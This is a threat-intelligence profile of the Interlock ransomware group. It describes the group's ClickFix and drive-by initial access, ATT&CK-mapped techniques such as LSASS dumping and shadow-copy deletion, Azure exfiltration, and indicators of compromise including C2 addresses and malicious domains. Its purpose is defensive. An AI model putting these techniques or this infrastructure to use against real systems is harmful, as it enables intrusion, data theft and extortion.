THREAT ACTOR

Interlock

7.1
THREAT LEVEL
EMERGENCE DATE
Sep 2024
CATEGORY
Closed Group
AFFILIATIONS

Suspected connections to Rhysida ransomware operation based on technical similarities and operational timing

DEscription

Interlock came up in September 2024 as a cyber extortion operation targeting critical infrastructure across North America and Europe through uncommon attack methods. The group has compromised over 80 organizations in less than one year, building out high technical maturity through cross-platform malware variants, custom tooling, and virtual machine-focused encryption strategies that bypass traditional security defenses.

Operating as a closed collective likely derived from the Rhysida ransomware family, the operation draws on drive-by downloads, ClickFix/FileFix social engineering, and Azure-based data exfiltration in methodical 17-day attack timelines. Despite its recent emergence, the FBI characterized the threat as sufficiently serious to warrant Joint Cybersecurity Advisory AA25-203A in July 2025, though no arrests or enforcement actions have occurred to date.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
lethality
Evaluates the potential for damage from the attack, including the ability to disrupt operations, and cause financial loss, damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Closed Group

The operation functions as a closed group without traditional affiliate recruitment or public advertising. FBI/CISA joint advisory confirms the group does not operate as traditional RaaS but functions as closed operation. Federal agencies assess actors as financially motivated and opportunistic, selecting victims based on opportunity rather than specific strategic criteria. The group's smaller victim count backs up closed private operation structure.

Current Status: Highly active with continuous operations and tactical evolution as of October 2025

Threat Level:
7.1

Origins and Methodology

The operation came up with rare cross-platform capabilities spanning Windows, Linux, and FreeBSD variants, setting it apart through uncommon drive-by download initial access methods that bypass traditional phishing-focused security awareness. The group pioneered a unique VM-focused encryption strategy that targets virtual machines while frequently leaving physical hosts, workstations, and servers unaffected, recognizing many organizations run critical applications in virtualized environments.

Their methodology relies on methodical 17-day attack timelines from initial compromise to encryption deployment, allowing extensive reconnaissance, credential harvesting, lateral movement, and data exfiltration before encryption triggers incident response. The operation combines drive-by compromise through compromised WordPress sites in the TAG-124 Traffic Distribution System, ClickFix/FileFix social engineering evolution, and Azure-native exfiltration at speeds up to 300 Mbps showing continuous tactical innovation throughout 2024-2025.

What is the Evolution of Interlock Ransomware?
0.1
Formation

Initial emergence in late September 2024 coincided with established ransomware ecosystem disruptions affecting major operations like LockBit, creating opportunities for new actors.

Building on suspected Rhysida codebase and operational foundations, the group focused on establishing technical capabilities through LibTomCrypt library implementation and cross-platform development. The operation showed immediate maturity with FreeBSD variant development and comprehensive PowerShell backdoor infrastructure reaching version 11 by Q4 2024.

0.2
EVOLUTION

Initial months following emergence (September-October 2024) featured basic fake Chrome/Edge updaters and earliest public malware submissions.

Around January 2025, ClickFix social engineering integration introduced fake CAPTCHA verification prompts executing malicious Base64-encoded PowerShell commands. Current operations since February 2025 added Berserk Stealer and Lumma Stealer information theft tools, NodeSnake RAT deployment with PHP-based variants (March 2025), and FileFix technique adoption with widespread PHP RAT distribution abusing Cloudflare Tunnel infrastructure (June 2025).

0.3
Lineage/Connections

Intelligence assessments note suspects attribution connections based on shared crypter infrastructure and operational parallels spanning BlackCat/ALPHV (attack structure, partial encryption techniques, backup infrastructure targeting), LockBit (operational themes, recovery sabotage emphasis), and Rhysida (technical similarities and operational timing).

Which Unique Techniques Does Interlock Use?

Interlock uses multi-stage attack chains that draw on both custom tools and legitimate administrative software to achieve comprehensive network compromise. What sets the operation apart is its rare combination of drive-by compromise initial access and VM-focused encryption capabilities.

TECHNIQUE

DETAILS

Infection Vectors

Drive-by downloads compromising legitimate websites with KongTuke/LandUpdate808 injection using single-line JavaScript hidden in HTML; IP filtering to target specific geographic regions; ClickFix fake CAPTCHA manipulation prompting users to execute Base64-encoded PowerShell commands.

FileFix File Explorer address bar exploitation; VPN credential brute-forcing with MFA fatigue attack integration

Target Selection

Opportunistic attacks with sectoral patterns revealing healthcare and critical infrastructure emphasis.

Concentrated targeting of healthcare systems for maximum disruption leverage alongside government entities, defense contractors, manufacturing operations, and education institutions across North America (primary focus) and Europe (secondary targeting)

Operational Complexity

Multi-stage attack chains bringing in 17-day average dwell times for extensive reconnaissance; TAG-124 Traffic Distribution System using 100+ compromised WordPress sites; custom NodeSnake RAT and PHP RAT variants.

BYOVD techniques deploying signed vulnerable drivers; Azure-native exfiltration at speeds up to 300 Mbps; FreeBSD support representing rare cross-platform capability

Key Features & Technical Details

Technical architecture represents advanced ransomware engineering with cross-platform capabilities and VM-focused encryption designed to maximize impact while evading defensive countermeasures.

FEATURE

DETAILS

Encryption Method

AES-256 in CBC or GCM modes with RSA-4096 for key protection; multi-threaded operation with twice as many encryption threads as file search threads based on CPU core count

File Extension

.interlock or .!NT3R10CK appended to encrypted files

Ransom Note

Evolved from !README!.txt to FIRST_READ_ME.txt to QUICK_GUIDE.txt with increasing emphasis on legal violations citing GDPR, HIPAA, CCPA, GLBA, NYDFS compliance failures

Double Extortion

AzCopy data upload to Azure storage blobs at high speeds up to 300 Mbps per blob; average 1.47 TB stolen per victim

Communication Channels

"Worldwide Secrets Blog" data leak site on Tor network; victim-specific dedicated Tor domains; contact email interlock@2mail.xx

Deployment Speed

Methodical 17-day average from initial compromise to encryption deployment allowing extensive reconnaissance and data exfiltration

Payment Method

Bitcoin payments via unique wallet addresses provided post-contact through .onion negotiation portals

Operational Model

Closed group without traditional affiliate recruitment; quality-over-quantity strategy focusing on high-value targets

Activities

Maintaining active operational status from September 2024 emergence through October 2025 with continuous victim claims on data leak sites and no enforcement disruptions observed, the group expanded from 24 victims through Q1 2025 to 60+ by mid-2025. Operational tempo shows steady expansion with FBI investigations ongoing through June 2025, though zero arrests, infrastructure takedowns, or sanctions have occurred to date, indicating monitoring phase typical for recently emerged threats before comprehensive enforcement actions materialize.

Which Industries Are Most Vulnerable to Interlock?

Primary targeting concentrates on healthcare systems (documented incidents affecting thousands of patients), critical infrastructure, government entities (municipal and federal operations), defense contractors (classified supply chain data theft with national security implications), manufacturing, education, technology, financial services, professional services, and transportation sectors across predominantly North American geographic focus with secondary European expansion in Italy, Germany, United Kingdom, France, and Spain.

HAL Most Recent Attacks

Modus Operandi

Comprehensive attack methodologies integrate technical capabilities with strategic operational security, making it possible for systematic network compromise across enterprise environments.

Details

Drive-by Compromise (T1189): Compromising legitimate websites with KongTuke/LandUpdate808 injection using single-line JavaScript hidden in HTML; IP filtering to target specific geographic regions; fake browser and security software update delivery. User Execution: Malicious File (T1204.002): ClickFix fake CAPTCHA manipulation prompting users to execute Base64-encoded PowerShell commands; FileFix File Explorer address bar exploitation; clipboard manipulation for payload delivery.

Valid Accounts (T1078): Pre-acquired credentials from Initial Access Brokers through underground marketplaces like ru-market; credentials from earlier infostealer campaigns or compromised enterprise systems.

Details

System Owner/User Discovery (T1033): WindowsIdentity.GetCurrent() for user identification and privilege assessment. System Information Discovery (T1082): systeminfo command execution; Get-PSDrive for drive and share discovery; hardware and software inventory collection. System Service Discovery (T1007): tasklist /svc for service enumeration; Get-Service for comprehensive service discovery.

System Network Configuration Discovery (T1016): arp -a for network configuration discovery; IP address and network topology enumeration. Network Service Scanning (T1046): Angry IP Scanner and Nmap deployment to discover internal hosts and enumerate open ports.

Details

Remote Access Software (T1219): AnyDesk, PuTTY, ScreenConnect (cracked versions) for remote connectivity; fake browser update RAT deployment. Ingress Tool Transfer (T1105): Credential stealer and keylogger download; secondary payload delivery.

Application Layer Protocol (T1071): Cloudflare Tunnel services abuse with TryCloudflare subdomains for communication masking. Proxy (T1090): SystemBC proxy deployment.

Details

Masquerading (T1036.005): conhost.exe encryption binary disguising as Windows Console Host; "Chrome Updater" registry entries mimicking legitimate software. System Binary Proxy Execution: Rundll32 (T1218.011): rundll32.exe executing tmp41.wasd DLL; PHP RAT execution via rundll32 with .png files. Indicator Removal on Host: Clear Windows Event Logs (T1070.001): Systematic deletion of system and security logs from infected hosts.

Impair Defenses: Disable or Modify Tools (T1562.001): BYOVD techniques deploying signed but vulnerable kernel-mode drivers to disable security software; GPO changes and PowerShell scripts disabling antivirus services. Indicator Removal on Host: Timestomp (T1070.006): Altering file metadata to make malicious actions appear at earlier or innocuous times.

Details

Credentials from Password Stores: Credentials from Web Browsers (T1555.003): Systematic browser credential extraction and saved password harvesting. Input Capture: Keylogging (T1056.001): klg.dll keylogger deployment logging keystrokes to conhost.txt files. OS Credential Dumping: LSASS Memory (T1003.001): LSASS memory dumps to capture active session credentials.

OS Credential Dumping: NTDS (T1003.003): Domain credential harvesting. Unsecured Credentials (T1552): Custom cht.exe credential stealer for harvesting.

Details

Tor-based communication infrastructure via Ingress Tool Transfer (T1105) with encrypted channels; Cloudflare Tunnel abuse with dynamically generated TryCloudflare subdomains for ephemeral, legitimate-appearing proxy domains; multiple C2 server rotation for operational resilience.

Details

Valid Accounts (T1078): Compromised credential abuse for system access; domain account utilization for lateral movement. Remote Desktop Protocol (T1021.001): RDP connections using compromised credentials; remote system access for malware deployment.

System Services: Service Execution (T1569.002): PSExec and Windows scheduled tasks for payload propagation.

Details

Exfiltration to Cloud Storage (T1567.002): AzCopy data upload to Azure storage blobs at high speeds up to 300 Mbps per blob. Data from Cloud Storage Object (T1530): Azure Storage Explorer for cloud data access and navigation.

Exfiltration Over Alternative Protocol (T1048): WinSCP for secure file transfer protocol abuse.

Details

Registry Run Keys/Startup Folder (T1547.001): Registry Run Key creation with "Chrome Updater" value at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run; file placement in %AppData%\Microsoft\Windows\Start Menu\Programs\Startup.

Scheduled Task (T1053.005): TaskSystem executing daily at 20:00 using System account privileges; WindowsUpdateSync keeping up persistence through Base64-encoded payload execution.

Details

Organization-wide system encryption causing operational disruption with VM-focused targeting allowing for rapid compromise; comprehensive backup destruction creating recovery challenges with 3-week timelines to restore core services in documented incidents; critical service interruption including EHR systems offline, elective procedures cancelled, and revenue collection impairment.

Details

Data Encrypted for Impact (T1486): AES-CBC with RSA encryption for file encryption; cross-platform encryptor deployment; multi-threaded encryption for operational efficiency. Inhibit System Recovery (T1490): Removal of backup files and deletion of Volume Shadow Copies using vssadmin or diskshadow.

Disk Wipe: Disk Content Wipe (T1561.001): Destructive actions preventing recovery.

Details

Ransom demands ranging hundreds of thousands to millions depending on victim size and impact; 96-hour (4-day) response deadlines from encryption event. Ransom notes increasingly emphasize legal violations citing GDPR, HIPAA, CCPA, GLBA, NYDFS Cybersecurity Regulation compliance failures with warnings highlighting "severe fines for non-compliance and lawsuits from affected parties" and 72-hour extended warnings before data publication.

Tor-based negotiation platforms provide victims with unique 60-character alphanumeric Company IDs for communication.

Details

Volume shadow copy deletion through Inhibit System Recovery (T1490); comprehensive backup system targeting; log destruction for evidence elimination; anti-forensics implementation including time stomping and metadata alteration.

Indicators of Compromise (IOCs)

Operations generate distinctive technical indicators across file systems, network infrastructure, and behavioral patterns that allow for detection and attribution of compromise activities.

INDICATOR

DETAILS

File Hashes

SHA256: e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1 (Windows encryptor)
SHA256: c733d85f445004c9d6918f7c09a1e0d38a8f3b37ad825cd544b865dba36a1ba6 (Linux encryptor)
SHA256: 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f (Cross-platform variant)
SHA256: C20BABA26EBB596DE14B403B9F78DDC3C13CE9870EEA332476AC2C1DD582AA07 (cht.exe credential stealer)
SHA256: A4F0B68052E8DA9A80B70407A92400C6A5DEF19717E0240AC608612476E1137E (klg.dll keylogger)
SHA256: 3e4407dfd827714a66e25c2baccefd915233eeec8fb093257e458f4153778bee (Interlock RAT)
SHA256: 7501623230eef2f6125dcf5b5d867991bdf333d878706d77c1690b632195c3ff (ClickFix PowerShell Loader)

IP Addresses

212.237.217[.]182 (Primary C2 address)
96.62.214[.]11 (Hardcoded in Interlock RAT)
168.119.96.41 (Primary backdoor C2)
95.217.22.175 (Secondary C2 server)
178.156.129.27 (Backup C2 infrastructure)
128.140.120.188 (Multi-campaign C2 server)
177.136.225.135 (Recent campaign infrastructure)

Domains/URLs

cluders.org (Suspicious domain for initial access)
bronxy.cc (Fake verification and payload delivery)
fake-domain-1892572220.com (Dynamically generated domain)
basiclock.cc (Social engineering landing page)
dijoin.org, playiro.net, doriot.info (Campaign-specific domains)
dashes.cc (Payload server infrastructure)
TryCloudflare pattern with dynamically generated trycloudflare.com subdomains for Cloudflare Tunnel abuse

File Paths

%AppData%\Microsoft\Windows\Start Menu\Programs\Startup (Dropped files for execution on user login)
%AppData%\Roaming (PHP RAT deployment directory)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ("Chrome Updater" value for automatic startup execution)

File Extensions

.interlock (encrypted file extension)
.!NT3R10CK (encrypted file extension variant)

Exploits and Vulnerabilities

EXPLOITS AND VULNERABILITIES

CVE

CVSS

DESCRIPTION

Windows Kernel Privilege Escalation

CVE-2024-21407

8.1

Critical Windows Kernel privilege escalation flaw weaponized post-initial access to gain SYSTEM privileges

Additional Attack Vectors: Unpatched VPNs through credential brute-forcing and MFA fatigue attacks, Microsoft Exchange servers exploitation, internet-facing applications targeting, ClickFix/FileFix social engineering techniques bypassing phishing-focused security awareness, drive-by downloads from compromised legitimate websites using TAG-124 Traffic Distribution System with 100+ compromised WordPress sites, and BYOVD techniques using signed vulnerable kernel-mode drivers to disable security software.